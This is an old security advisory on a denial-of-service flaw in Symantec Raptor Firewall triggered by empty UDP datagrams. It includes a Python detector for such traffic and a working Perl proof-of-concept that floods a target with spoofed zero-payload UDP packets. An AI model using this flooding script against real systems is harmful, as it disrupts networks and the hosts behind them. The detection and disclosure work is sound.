
Raptor Firewall Zero-Length UDP Packet Denial of Service Vulnerability


Published: 2001-11-08
Updated: 2001-11-08
Severity:
Threat type: Remote denial of service
Error type: Unexpected-condition handling error
Exploitation: Server mode

Affected Systems
Symantec Raptor Firewall 4.0.0 HP-UX
   - HP HP-UX 10.20
Symantec Raptor Firewall 5.0.3 Windows NT
   - Microsoft Windows NT 4.0
   - Microsoft Windows NT 4.0SP1
   - Microsoft Windows NT 4.0SP2
   - Microsoft Windows NT 4.0SP3
   - Microsoft Windows NT 4.0SP4
   - Microsoft Windows NT 4.0SP5
   - Microsoft Windows NT 4.0SP6a
Symantec Raptor Firewall 6.0.2 Windows NT
   - Microsoft Windows NT 4.0
   - Microsoft Windows NT 4.0SP1
   - Microsoft Windows NT 4.0SP2
   - Microsoft Windows NT 4.0SP3
   - Microsoft Windows NT 4.0SP4
   - Microsoft Windows NT 4.0SP5
   - Microsoft Windows NT 4.0SP6a
Symantec Raptor Firewall 6.0.2 Solaris
   - Sun Solaris 2.6
Symantec Raptor Firewall 6.0.3 HP-UX
   - HP HP-UX 11.0
Symantec Raptor Firewall 6.5 Windows NT
   - Microsoft Windows NT 4.0
   - Microsoft Windows NT 4.0SP1
   - Microsoft Windows NT 4.0SP2
   - Microsoft Windows NT 4.0SP3
   - Microsoft Windows NT 4.0SP4
   - Microsoft Windows NT 4.0SP5
   - Microsoft Windows NT 4.0SP6a
Symantec VelociRaptor 1.0
Symantec VelociRaptor 1.1
Detailed Description
Raptor Firewall is a commercial firewall developed by Symantec.

The firewall mishandles UDP packets: when it receives a UDP datagram with a zero-byte payload, system CPU utilization rises to 100%.

A remote user can therefore cause a denial of service against the firewall and the host it runs on.
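Because the trigger is simply a UDP datagram whose length field equals the 8-byte header (no payload), a defender can flag the condition in captured traffic. The following parser is an added example, not part of the original advisory or of any Symantec code; the packets it inspects are constructed inline with documentation addresses, and the per-source threshold is an arbitrary assumption.

```python
import struct
from collections import Counter

def parse_ipv4_udp(packet):
    """Return (src, dst, sport, dport, payload_len) for an IPv4/UDP packet, else None."""
    if len(packet) < 20 or packet[0] >> 4 != 4:
        return None
    ihl = (packet[0] & 0x0F) * 4          # IPv4 header length in bytes
    if packet[9] != 17 or len(packet) < ihl + 8:   # protocol 17 = UDP
        return None
    src = '.'.join(str(b) for b in packet[12:16])
    dst = '.'.join(str(b) for b in packet[16:20])
    sport, dport, udp_len = struct.unpack('!HHH', packet[ihl:ihl + 6])
    if udp_len < 8:                        # malformed: length smaller than the UDP header
        return None
    return src, dst, sport, dport, udp_len - 8

def count_empty_udp(packets, threshold=3):
    """Count zero-payload UDP datagrams per source address.

    Returns the sources that sent at least `threshold` such datagrams;
    the threshold is an assumed tuning value, not something the advisory gives.
    """
    counts = Counter()
    for pkt in packets:
        parsed = parse_ipv4_udp(pkt)
        if parsed and parsed[4] == 0:
            counts[parsed[0]] += 1
    return {src: n for src, n in counts.items() if n >= threshold}

def build_udp(src, dst, sport, dport, payload=b''):
    """Construct a minimal IPv4/UDP packet (checksums left zero) for offline testing."""
    udp = struct.pack('!HHHH', sport, dport, 8 + len(payload), 0) + payload
    ip = struct.pack('!BBHHHBBH4s4s', 0x45, 0, 20 + len(udp), 0, 0, 64, 17, 0,
                     bytes(int(o) for o in src.split('.')),
                     bytes(int(o) for o in dst.split('.')))
    return ip + udp

# Constructed sample: five empty datagrams from one host, one normal datagram from another.
SAMPLE = [build_udp('192.0.2.10', '198.51.100.1', 40000, 53)] * 5 + \
         [build_udp('192.0.2.11', '198.51.100.1', 40001, 53, b'\x12\x34')]

if __name__ == '__main__':
    print(count_empty_udp(SAMPLE))        # {'192.0.2.10': 5}
```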

Test Code
#!/usr/bin/perl
###################################
# This Code is for education only #
###################################
# Greetings to kitchen from #perl on irc openproject.net
# For the help on some perl questions.
# Firewalls are hard on the outside and crunchy on the inside
#
# The Raptor Firewall UDP-GSP (UDP-Proxy) gets 100% CPU load
# when getting UDP packets with no data in it
#
# Written 21.Jun 2001 by Max Moser mmo@remote-exploit.org
#
# http://www.remote-exploit.org
#

use Net::RawIP;
use Getopt::Long;

GetOptions('src=s','dst=s','num=i');

# All three options are required; use logical OR, not the bitwise "|" of the original
if (!$opt_src || !$opt_dst || !$opt_num ){
    print "\nUsage parameters for ".$0.":\n";
    print "\t--src\t IP-Sourceaddress\n";
    print "\t--dst\t IP-Destinationaddress\n";
    print "\t--num\t Numer of UDP packets to send\n";
    print "\nExample:\n";
    print "\t".$0." --src=192.168.0.1 --dst=192.168.0.354 --num=1000\n\n\n";
    exit(1);
};

# Some defines
$| = 1;
@anim= ("\\","|","/","-","\\","|","/","-");
$source=$opt_src;
$destination=$opt_dst;
$numpack=$opt_num;

print "\n\n\tSending packets now  ";
for($x=0;$x<$numpack;$x=$x+1){
    my $sport=(rand(65534)+1);
    my $dport=(rand(1024)+1);
    my $c=new Net::RawIP({udp=>{source=>$sport,dest=>$dport}});
        $c->set({ip=>{saddr=>$source,daddr=>$destination},{udp}});
        $c->send;
        undef $c;
    for ($y=0;$y<8;$y=$y+1){
        print "\b" . $anim[$y];
        select (undef,undef,undef,0.01);
        if ($y==8){ $y=0};      
    };
};

print "\n\n\nSuccessfully sent ".$numpack." packets to ". $destination . "\n\n";

Solution
Symantec Enterprise Firewall 6.5.x is not affected by this vulnerability.

Related Information
Max Moser <mmo@phase1.ch>